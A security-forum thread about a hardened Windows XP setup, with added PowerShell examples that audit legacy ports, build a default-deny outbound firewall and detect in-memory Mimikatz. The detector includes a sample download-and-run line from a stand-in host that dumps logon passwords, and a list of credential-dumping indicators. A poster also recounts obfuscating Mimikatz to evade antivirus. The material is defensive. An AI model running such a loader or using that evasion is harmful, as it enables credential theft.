Status
Not open for further replies.
Latest changes
Dec 26, 2019
Operating system
Not listed
System type
32-bit operating system; x86-based processor
Update and Security
No security updates
User Access Control
Notify me only when programs try to make changes to my computer
Firewall and Network protection
Microsoft Defender Firewall is active
User permissions
Administrator account
User account
Local account only
Sign-in options
  • Account Password
  • Malware exposure
    No malware samples are downloaded
    Real-time Malware protection
    • Windows Firewall
    • Firewall Hardware on router
    • 1° AdGuard DNS / 2° CloudFlare DNS
    • MBAE Premium - Custom Setting
    • OSA - Custom Setting
    • Black Viper's List - Some services Disabled/Manual
    Modified security settings
    • Trick POS Ready 2009 + KB4500331.
    • PsExec - Run browsers + email client with limited rights - Exceptions (OSA) for Interlink Mail News and New Moon.
    • DEP Always ON
    • SMB Protocol Disabled
    • No .NET Framework installed
    • I.E.8 No Flash + Trick 1803 (Block the downloadable executable files) + Disable script (F12 - on/off) + block execution I.E.8.
    Periodic scanners
    Hitman Pro, McAfee Stinger, HijackThis Portable, AdwCleaner v6.0.4.7
    Browser and Extensions
    New Moon 28 - (Pale Moon fork for Windows XP) Custom Setting about:config

    • Noscript
    • U.B.O.Legacy
    • Decentraleyes
    • No Resource URI Leak
    • Canvas Blocker Legacy 0.2 - Only to pass the ClientRects Fingerprint test
    Privacy tools and VPN
    • 1° AdGuard DNS / 2° CloudFlare DNS
    • W.M.P. off
    • O.E. off
    • New Moon Home page = DuckDuckGO - Custom settings saved via URL no cookies
    Password manager
    My Memory
    Search engine
    DuckDuckGo
    Maintenance tools
    • CCleaner - Many custom rules created by me
    • RegSeeker
    • Process Explorer
    • SigcheckGUI
    • Dependency Walker
    • CFF Explorer
    • Currports
    • WWDC
    • IObit Uninstaller Portable
    • SpeedyFox - Custom rule for Interlink Mail News
    • SUMo Portable
    • JKDefragGUI
    Photos and Documents backup
    Pen Drive
    Data Backup Schedule
    Once or multiple times per month
    Backup and Restore
    Acer System Backup
    Backup Schedule
    Once or more per year
    Computer Activity
  • Online banking
  • Browsing the web and checking emails
  • Office and other work-related software (Work from Home)
  • Learning computer languages or creating apps
  • Computer Specifications
    Acer Intel Celeron M380 1.60 GHz 1GB RAM
    Your changelog
    1. Added some custom rules in OSA for Mimikatz Dump Lsass.exe mitigation.
    2. Added "sc" command rule block in OSA.
    3. Added rule to block execution of I.E.8 in OSA.
    4. Added rule to block msbuild.exe in OSA and the same rule on the Registry Key.
    5. Blocking rule in host file for CCleaner.
    Staff notes

    This setup configuration may put your device at risk.
    We don't recommend that other members use this security setup. We cannot be held responsible for problems that may occur to your device by using this security setup.

    This computer configuration is using an unsupported operating system. If possible, we recommend upgrading to an operating system that is supported by its developers.

    DDE_Server

    I would not use the Windows firewall; I would use Sygate Personal Firewall. It is the best program I have tried in many years.
    If you want a good firewall there are two solutions which are known (Sophos and FortiGate). However, they are expensive; if I could afford it I would buy a UTM instead :ROFLMAO: :ROFLMAO:

    A firewall combined with other proactive features such as IDS and IPS and central management.

    Sampei Nihira

    > What is the point of using old OS with tons of security programs to patch all vulnerabilities when Windows 10 protect computer from vulnerabilities by default?
    I also use Windows 10.
    At this moment I am at home and I am answering your question from the PC with Windows 10.

    You will be surprised to know that there are still users who use Windows 2000, XP, Vista, but also Windows 7 and later OS.
    For example, my colleague "Win32" on the MSFN forum:

    Raiden

    > If you want a good firewall there are two solutions which are known (Sophos and FortiGate). However, they are expensive; if I could afford it I would buy a UTM instead :ROFLMAO: :ROFLMAO:
    >
    > A firewall combined with other proactive features such as IDS and IPS and central management.

    You could build your own for much cheaper. If you have an old desktop lying around that you aren't using, you could put something like Sophos XG Home, pfSense, etc. on it and you have yourself a sweet hardware firewall with all those features. ;)

    Sampei Nihira

    > A look over there is like going back in time. These people are serious about their dinosaurs! ;):LOL:
    :D

    Instead, it is a great satisfaction.
    For example, I was very happy to have set up my I.E.8 as in the images below:

    [two screenshots of the I.E.8 settings: 110.JPG, 110a.JPG]


    Even if I never use it.
    By the way, we want to discuss the "Session Ticket Support" parameter.
    If you pass the test with your browsers, it is not always a good thing.

    Prorootect

    Surely you've disabled NetBIOS over TCP/IP (all interfaces)? And disabled ports 135, 137-139, 445... Type netstat -an in a command prompt window to check for your open ports...
    - So use "Seconfig XP" v1.1, small but powerful software by Davis Mosenkovs; download link on Softpedia: Download Seconfig XP 1.1
    Good read: How to disable Ports 135, 137-139, 445 (Windows XP)
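    Added example (not code from the original post or from any poster): a PowerShell audit of the items Prorootect asks about (NetBIOS over TCP/IP, ports 135, 137-139 and 445) together with the "SMB Protocol Disabled" and "DEP Always ON" entries of the configuration at the top of the thread. It assumes a supported Windows (8.1/10/11, PowerShell 5, elevated prompt); the NetTCPIP and SmbShare cmdlets do not exist on Windows XP, where netstat -an and WWDC remain the tools. The remediation commands at the end are left commented out and are assumptions to be reviewed per host.

```powershell
# Added example, not from the original post: audit the classic inbound exposure
# (RPC endpoint mapper, NetBIOS, SMB), NetBIOS over TCP/IP, SMBv1 and the DEP policy.
# Requires Windows 8.1/10/11, PowerShell 5+, run from an elevated prompt.

$legacyPorts = @{ TCP = 135, 139, 445; UDP = 137, 138 }   # 135 RPC, 137/138/139 NetBIOS, 445 SMB

# 1. Anything still listening on the worm-era ports?
$tcpListeners = Get-NetTCPConnection -State Listen |
    Where-Object { $_.LocalPort -in $legacyPorts.TCP } |
    Select-Object LocalAddress, LocalPort, OwningProcess
$udpListeners = Get-NetUDPEndpoint |
    Where-Object { $_.LocalPort -in $legacyPorts.UDP } |
    Select-Object LocalAddress, LocalPort, OwningProcess

# 2. NetBIOS over TCP/IP per interface.
#    NetbiosOptions: 0 = use DHCP setting (usually enabled), 1 = enabled, 2 = disabled
$netbtKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces'
$netbt = Get-ChildItem $netbtKey | ForEach-Object {
    $opt = (Get-ItemProperty $_.PSPath).NetbiosOptions
    [pscustomobject]@{ Interface = $_.PSChildName; NetbiosOptions = $opt; Disabled = ($opt -eq 2) }
}

# 3. SMBv1 server still enabled? (the item the config lists as "SMB Protocol Disabled")
$smb1Enabled = (Get-SmbServerConfiguration).EnableSMB1Protocol

# 4. DEP policy: 0 = AlwaysOff, 1 = AlwaysOn, 2 = OptIn, 3 = OptOut ("DEP Always ON" is 1)
$depPolicy = (Get-CimInstance Win32_OperatingSystem).DataExecutionPrevention_SupportPolicy

# Report
'TCP listeners on 135/139/445:'; $tcpListeners | Format-Table -AutoSize
'UDP listeners on 137/138:';     $udpListeners | Format-Table -AutoSize
'NetBIOS over TCP/IP:';          $netbt        | Format-Table -AutoSize
"SMB1 server enabled : $smb1Enabled"
"DEP policy          : $depPolicy (1 = AlwaysOn)"

# Remediation, commented out on purpose; each line changes the host and needs a reboot or review:
# Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
# Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart
# Get-ChildItem $netbtKey | ForEach-Object { Set-ItemProperty $_.PSPath -Name NetbiosOptions -Value 2 }
# New-NetFirewallRule -DisplayName 'Block legacy RPC/NetBIOS/SMB inbound' -Direction Inbound `
#     -Action Block -Protocol TCP -LocalPort 135,139,445
# bcdedit /set '{current}' nx AlwaysOn
```

    The listener check reports the owning PID so you can tell a service you rely on (e.g. file sharing you actually use) from something that should not be there; the NetBIOS value is read per interface because a single enabled adapter is enough for name-service traffic to leak.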

    ichito

    > - So use "Seconfig XP" v1.1, small but powerful software by Davis Mosenkovs; download link on Softpedia: Download Seconfig XP 1.1
    Still on board on my XP as the support for Kerio FW Free 2.1.5... yes... I'm using a firewall from 2004, so... could I feel like a dinosaur? :) As already mentioned, there are still a few firewalls from the past to get, e.g. Kerio, Sygate, Sunbelt, NetVeda SN, Filseclab, Outpost, PC Tools, Privatefirewall or even the last free Online Armor from Tall Emu, but nowadays we have a nice firewall that is also free: SpyShelter Free v12. It's for sure worth attention.

    Sampei Nihira

    > Surely you've disabled NetBIOS over TCP/IP (all interfaces)? And disabled ports 135, 137-139, 445... Type netstat -an in a command prompt window to check for your open ports...
    > - So use "Seconfig XP" v1.1, small but powerful software by Davis Mosenkovs; download link on Softpedia: Download Seconfig XP 1.1
    > Good read: How to disable Ports 135, 137-139, 445 (Windows XP)
    Look in my configuration:
    System Utilities - WWDC
    Windows Worms Doors Cleaner
    If you search on the net, it does in part what you wrote ;)

    ForgottenSeer 823865

    To be honest I don't see, in my case, what a 3rd party firewall affords more than Windows Firewall: pop-up alerts when an outbound connection is created? No need, I block all outbound connections first, then create my own rules manually.
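    Added example (not code from the original post): the default-deny outbound policy described in the post above, expressed for the Windows Firewall on Windows 8.1/10/11 with PowerShell from an elevated prompt. The program paths are assumptions for illustration; the resolver addresses are the published anycast addresses of the AdGuard DNS and Cloudflare DNS services named in the configuration, also taken as an assumption here.

```powershell
# Added example, not from the original post: block all outbound first, then allow
# only what is needed, per program and per port. Windows 8.1/10/11, elevated prompt.

# 1. Default outbound action becomes Block on every profile (inbound is already Block).
Set-NetFirewallProfile -Profile Domain,Public,Private `
    -DefaultInboundAction Block -DefaultOutboundAction Block

# 2. DNS only from the DNS Client service and only to the resolvers you chose.
#    Assumed addresses: AdGuard DNS and Cloudflare DNS, as listed in the config.
$resolvers = '94.140.14.14', '94.140.15.15', '1.1.1.1', '1.0.0.1'
New-NetFirewallRule -DisplayName 'Allow DNS to chosen resolvers' -Direction Outbound -Action Allow `
    -Protocol UDP -RemotePort 53 -RemoteAddress $resolvers `
    -Program '%SystemRoot%\System32\svchost.exe' -Service Dnscache

# 3. DHCP lease renewal, otherwise the host silently loses its address when the lease expires.
New-NetFirewallRule -DisplayName 'Allow DHCP client' -Direction Outbound -Action Allow `
    -Protocol UDP -LocalPort 68 -RemotePort 67 `
    -Program '%SystemRoot%\System32\svchost.exe' -Service Dhcp

# 4. Browser: web ports only. Path is an assumption; point it at the browser you use.
New-NetFirewallRule -DisplayName 'Allow browser HTTP/HTTPS' -Direction Outbound -Action Allow `
    -Protocol TCP -RemotePort 80,443 -Program 'C:\Program Files\Mozilla Firefox\firefox.exe'

# 5. Mail client: IMAPS and submission ports only. Path is an assumption.
New-NetFirewallRule -DisplayName 'Allow mail client IMAPS/SMTP submission' -Direction Outbound -Action Allow `
    -Protocol TCP -RemotePort 993,465,587 -Program 'C:\Program Files\Mozilla Thunderbird\thunderbird.exe'

# 6. Verify the policy and list what is explicitly allowed out.
Get-NetFirewallProfile | Select-Object Name, DefaultInboundAction, DefaultOutboundAction
Get-NetFirewallRule -Direction Outbound -Action Allow -Enabled True |
    Select-Object DisplayName, Profile | Sort-Object DisplayName
```

    With the default set to Block, every program without a rule is dropped silently: Windows Update, time sync (W32Time) and anything else you want to keep working needs its own allow rule, which is exactly the point of building the list by hand.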

    ForgottenSeer 823865

    > How to find it then :ROFLMAO: :ROFLMAO:
    You can't by normal means. Maybe via a corporate firewall that has IPS/IDS, or by DLL monitoring.
    I remember a "colleague" showing me in real time how to evade AVs using obfuscated Mimikatz. The initial detection was originally like 15+ engines detecting it, and just by changing Mimikatz attributes, it gradually went to zero detection... If I remember, ESET was the last one.
    Now couple it with true fileless/in-memory delivery techniques or a kernel exploit and your traditional security software, whatever awesome default-deny or AV, will fail.
    Why do you think corporations invest in very expensive business solutions (which are often hardware based)? And even with them, they still get breached. So I laugh when some home user products claim to stop all malware when basic true exploits are just enough to beat them... Yes, they may stop your ordinary malware, not the complex ones like I saw.

    Of course you won't see such stuff around every corner; some will say they will never cross them (which is probably true), but we aren't in a security forum for Average Joe threats, we are here to learn about sophisticated ones and how to protect ourselves against them.

    Andy Ful

    In-memory Mimikatz can be delivered filelessly via PowerShell (Invoke-Mimikatz.ps1). It can be obfuscated to avoid AV detection. It can be dangerous for enterprises. In the home environment, any true fileless malware must be started by an exploit, which makes it far less likely than in enterprises, except when someone uses a vulnerable (not patched) system/software.
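    Added example (not code from the original post or from any poster): on a supported Windows with PowerShell 5, enable script block logging and scan the resulting event 4104 entries for the in-memory Invoke-Mimikatz delivery Andy Ful describes. Script block logging records each block as it is executed, so a string-obfuscated outer loader still leaves the de-obfuscated inner stage in a later 4104 event, which is what the AV-evasion test above does not see. The indicator list and the three sample blocks are constructed for this example.

```powershell
# Added example, not from the original post: enable script block logging, then hunt
# Microsoft-Windows-PowerShell/Operational event 4104 for Invoke-Mimikatz style loaders.
# Windows 8.1/10/11 with PowerShell 5+, elevated prompt for step 1.

# 1. Turn on script block logging (same key Group Policy writes).
$key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
New-Item -Path $key -Force | Out-Null
Set-ItemProperty -Path $key -Name EnableScriptBlockLogging -Value 1 -Type DWord

# 2. Indicators: Mimikatz module names plus the reflective-loading plumbing the
#    script needs once it is de-obfuscated. List is illustrative, not exhaustive.
$indicators = @(
    'Invoke-Mimikatz', 'sekurlsa::', 'privilege::debug', 'lsadump::',
    'Invoke-ReflectivePEInjection', 'VirtualAlloc', 'WriteProcessMemory',
    'FromBase64String', 'DownloadString', 'IEX', 'Invoke-Expression'
)

function Test-SuspiciousScriptBlock {
    param([string]$Text)
    $hits = foreach ($i in $indicators) { if ($Text -match [regex]::Escape($i)) { $i } }
    # One indicator ("IEX", "DownloadString") is everywhere in admin scripts; two or more together is the signal.
    [pscustomobject]@{ Hits = @($hits); Score = @($hits).Count; Suspicious = (@($hits).Count -ge 2) }
}

# 3. Live hunt. For 4104, Properties[2] is the ScriptBlockText field.
function Get-SuspiciousScriptBlocks {
    param([int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $text = [string]$_.Properties[2].Value
            $r = Test-SuspiciousScriptBlock $text
            if ($r.Suspicious) {
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    Score   = $r.Score
                    Hits    = ($r.Hits -join ', ')
                    Snippet = $text.Substring(0, [Math]::Min(120, $text.Length))
                }
            }
        }
}

# 4. Offline check against constructed samples: a benign block, a download-and-run
#    loader, and the de-obfuscated inner stage that script block logging would capture.
$samples = @(
    'Get-ChildItem C:\Users | Sort-Object LastWriteTime',
    'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command "privilege::debug sekurlsa::logonpasswords"',
    '$va = [Win32]::VirtualAlloc(0, $bytes.Length, 0x3000, 0x40); [Win32]::WriteProcessMemory($h, $va, $bytes, $bytes.Length, [ref]0)'
)
$samples | ForEach-Object {
    Test-SuspiciousScriptBlock $_ | Select-Object Score, Suspicious, @{ n = 'Hits'; e = { $_.Hits -join ', ' } }
}
# Expected: sample 1 scores 0, sample 2 scores 5, sample 3 scores 2; the last two are flagged.

# Live run once logging has been on for a while:
# Get-SuspiciousScriptBlocks | Format-Table -AutoSize
```

    Scoring on co-occurrence rather than on one string keeps routine admin scripts out of the results; pair this with Constrained Language Mode or an application allow-list if you want prevention rather than detection, since logging alone does not stop the credential dump.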

    Andy Ful

    > I don't have the PowerShell "problem".
    > And Mimikatz creates more problems for your OS after XP.
    > The attacker is hardly inclined to consider the 32-bit compromised PC.
    I know. You even do not have PowerShell installed. :)
    Mimikatz works on Windows XP. The exploit kit does not consider anything - it will attack any vulnerable system if only the right module is available.
    Anyway, my post was related to the @Umbra post. Both were not related to your config, but they had a rather general meaning.(y)

    Sampei Nihira

    > I know. You even do not have PowerShell installed. :)
    > Mimikatz works on Windows XP. The exploit kit does not consider anything - it will attack any vulnerable system if only the right module is available.
    > Anyway, my post was related to the @Umbra post. Both were not related to your config, but they had a rather general meaning.(y)
    Yes, but I would like to broaden the discussion since Umbra mentioned it.
    I know Mimikatz works on Windows XP.
    On a compromised Windows XP it could even silently install PowerShell 2.

    If there is someone who is interested in the discussion, he can refer to the thread below:


    I post from page 8 onward, but the previous pages are also interesting.
    Final conclusion.
    In my PC, even in case of compromise of the OS (absurd hypothesis), Mimikatz could not act.